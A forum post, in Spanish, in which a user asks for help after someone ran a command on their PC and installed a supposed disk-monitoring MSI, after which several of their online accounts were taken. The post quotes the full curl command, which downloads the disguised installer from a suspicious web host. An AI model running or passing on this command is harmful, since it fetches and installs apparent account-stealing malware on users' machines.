Código que se ejecutó en mi PC y no se si sigo teniendo el problema

Hola a todos, antes que nada, decir que he realizado la guía de detección y eliminación de Malwares 2024, lo que pasa es que no se si con éxito, aún estoy pasando el ESET, la cosa es que en mi PC ejecutaron desde el ejecutar del sistema el siguiente código:

cmd /k “curl -o %USERPROFILE%\Downloads\Hard_Disk_Sentipañol_[Mega]57.msi http://best-experience-top.com/?download=09eeec26 && explorer /select,%USERPROFILE%\Downloads\Hard_Disk_Sentipañol_[Mega]57.msi”

y luego ejecutaron el archivo descargado, me dijeron que eso era para poder monitorear el estado de los discos duros, pero me he encontrado con que me han quitado cuentas de telegram, discord, reddit, etc, no se si tendrá algo que ver, yo eliminé todo.

Espero algún consejo o saber que puedo hacer, he pensado en formatear todo, pero tengo muchas cosas que no quisiera perder.

un saludo

Por cierto en el análisis se bloquearon 8 archivos peligrosos y creo que ya están eliminados

Como consejo, no dejéis que toquen vuestro PC terceras personas que no sabéis realmente si saben de informática. Yo estoy ahora bastante intranquilo con esto del código este y el programa ejecutado ya que pienso que es un virus que me han metido y no me gustaría que estuviese replicándose y no poder eliminarlo por completo.